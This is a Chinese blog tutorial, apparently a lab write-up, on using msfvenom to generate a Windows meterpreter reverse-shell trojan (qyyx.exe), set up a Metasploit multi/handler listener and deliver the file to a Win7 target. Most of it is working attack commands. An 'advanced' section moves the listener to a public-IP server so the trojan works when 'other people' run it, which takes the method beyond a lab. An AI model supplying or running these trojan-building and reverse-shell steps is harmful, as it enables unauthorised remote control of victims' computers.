Msfvenom是Metasploit独立的有效载荷生成器,也是msf有效载荷和msphencode的替代品。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode,常用于生成木马,在目标机器上执行,在本地机器kali中上线

实验目的

用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,实现控制靶机win7

实验环境

  • 攻击机:kali linux(192.168.72.133)
  • 靶机:win7 x64(192.168.72.136)
  • 工具:Metasploit和msfvenom
  • 环境:同一局域网

查看所有--payload的模块

msfvenom -l payloads

首先使用msfvenom生成一个可以被windows执行的exe木马文件,免杀就不做了,现在安装直接秒杀,已经没什么用了

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.133 LPORT=5555 -f exe > qyyx.exe
  • 192.168.72.133是kali的IP地址
  • 5555是选择kali监听的端口
  • qyyx.exe是生成exe文件

# 启动metasploit渗透框架
msfconsole

# 使用侦听模块
use exploit/multi/handler

# 加载payload攻击模块
set payload windows/meterpreter/reverse_tcp

# 设置kali的ip
set LHOST 192.168.72.133

# 设置kali的端口
set LPORT 5555
# 查看参数设置
show options

# 开始监听
run

接下来就可以把qyyx.exe木马文件发送给win7了
只要win7安装并且运行,shell就会反弹到kali中

怎么将kali生成的exe拿出来?有三个方法

  • 第一个方法是启动kali的apache
    systemctl start apache2
    把exe文件放到/var/www/html/目录下,在win7中访问kali的ip加文件名字
    192.168.72.133/qyyx.exe就可以下载了
  • 第二个方法是复制粘贴,前提是有vmware tools
  • 第二个方法是打开kali自带的火狐浏览器上传到网盘中

双击运行后,打开cmd输入netstat –na可以看到一个外部连接

如果kali出现meterpreter > 就证明shell反弹成功,然后我们就可以在kali执行shell指令了(得到了管理员权限)

进阶玩法

我们把木马给其他人运行时发现kali这边没反应
因为生成木马用的是内网地址,不在同一网段,shell没法反弹
所以我们可以选择一个有公网IP的机器,让shell反弹给攻击机
有公网ip的机器可以是内网穿透节点,也可以是攻击机

之前写过内网穿透的教程了,现在就用服务器当攻击机演示
在centos7下安装Metasploit

yum install wget -y

wget https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-6.1.37%2B20220402102547~1rapid7-1.el6.x86_64.rpm

rpm -i metasploit-framework-6.1.37+20220402102547~1rapid7-1.el6.x86_64.rpm

安装之后,就从上面生成木马开始执行代码一路执行,不同的是监听ip,要换成服务器的公网ip

关于进阶玩法详细内容,请看Linux下安装nginx:https://blog.aerr.cn/1888.html

届ける言葉を今は育ててる
最后更新于 2022-04-04